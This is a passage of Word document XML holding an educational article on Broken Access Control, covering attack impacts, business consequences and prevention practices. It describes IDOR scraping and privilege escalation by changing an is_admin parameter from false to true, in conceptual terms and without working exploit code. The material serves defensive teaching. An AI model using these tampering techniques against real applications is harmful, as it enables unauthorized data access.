        <w:t xml:space="preserve"> Attackers can script automated tools to rapidly scrape the database. By looping through predictable object identifiers (IDOR), they can extract thousands of private records, including PII (Personally Identifiable Information), financial statements, and password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A9623" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Data Modification and Destruction:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If access control is missing on PUT, POST, or DELETE endpoints, attackers can modify database entries or wipe entire tables. For example, an attacker could change account numbers on invoices to divert payments to their own accounts or delete critical user profiles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443E8432" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Vertical Privilege Escalation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> By manipulating metadata or tampering with request parameters (such as changing a parameter from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>is_admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">=false to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>is_admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>=true), a standard user can elevate themselves to full administrative status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6256F2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Total System Compromise via Downstream Flaws:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In severe cases, gaining unauthorized administrative access allows attackers to reach hidden file-upload functionalities or internal configuration consoles. This often serves as a stepping stone to execute </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or trigger </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , giving them control over the underlying server infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE4128" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28065AB3"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The real-world operational and financial fallout of an access control failure can completely destabilize an enterprise, often dwarfing the technical cleanup costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D23D3A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Severe Financial Penalties &amp; Regulatory Non-Compliance:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modern privacy laws mandate strict data separation. If an organization exposes medical records or banking details due to an access control flaw, they face crippling fines under </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GDPR</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (up to 4% of global annual turnover), </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>HIPAA</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for healthcare data), or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>PCI-DSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for payment cards).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A839664" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Reputational Ruin &amp; Loss of Customer Trust:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trust is a business's most valuable asset. Public disclosure of a breach indicating that "any user could see another user's data by changing a number in the URL" portrays the engineering team as negligent. This leads to immediate customer churn and a drop in stock valuation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D3645" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Intellectual Property &amp; Corporate Theft:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Beyond customer data, broken access control can expose a company's internal proprietary source code, trade secrets, pending patents, or corporate strategic plans, completely wiping out their competitive advantage in the marketplace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7287DAE4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Legal Liabilities and Class-Action Lawsuits:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Affected consumers, partners, and stakeholders routinely file massive class-action lawsuits against companies that fail to implement basic security checks, leading to prolonged, multi-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>million dollar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> legal battles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E55742" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Prevention (Building it Right)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595177AF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Secure Coding Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25696651"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To ensure Broken Access Control is never introduced into a codebase, developers must adopt a proactive, security-first approach to writing software from day one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578700EC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Adopt a "Deny by Default" Strategy:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure the application's routing mechanism or security framework to block all incoming traffic to every endpoint by default. Access should only be granted when a developer explicitly applies an authorization rule to a specific route.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713B5338" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Use Proven, Centralized Security Frameworks:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid writing custom, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>adhoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> if/else statements for authorization across different controllers. Instead, rely on established, thoroughly tested ecosystem libraries that offer declarative or annotation-based access control. Examples include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF4845B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Java (Spring Boot):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilizing @PreAuthorize("hasRole('ADMIN')") or checking object ownership via Spring Security expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E865806" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Python (Django/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforcing built-in permission classes or middleware dependencies like Depends(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>verify_admin_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EBA42A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Node.js (Express):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implementing trusted authorization middleware (like Passport.js or custom centralized gateway guards) across route groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6505ABC2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enforce Server-Side Validations Exclusively:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Never trust the client UI. Every single request received by the backend must independently authenticate the user, parse </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>their permissions, and verify that they own or are allowed to touch the requested object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B1CC7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cryptographically Secure State &amp; Tokens:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If using stateless tokens like JSON Web Tokens (JWTs) for authorization, the backend must rigidly verify the token signature (HMAC or RSA) using secure keys before processing any data inside the payload. Furthermore, ensure that sensitive state indicators (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>isAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>: true) cannot be manipulated or injected via unencrypted cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AABB5F7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Architecture &amp; Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38709CFF"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Securing the application at the structural level ensures that even if a developer makes a coding error, downstream architectural guardrails will catch or contain the mistake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5343BB6D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Principle of Least Privilege (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>PoLP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Design the entire ecosystem so that every user, service, account, and process has access </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the absolute minimum resources necessary to complete its task. If a user only needs to read their own profile, their database role or service account should explicitly lack the permissions to run blanket SELECT * queries across the table.</w:t>
      </w:r>
    </w:p>
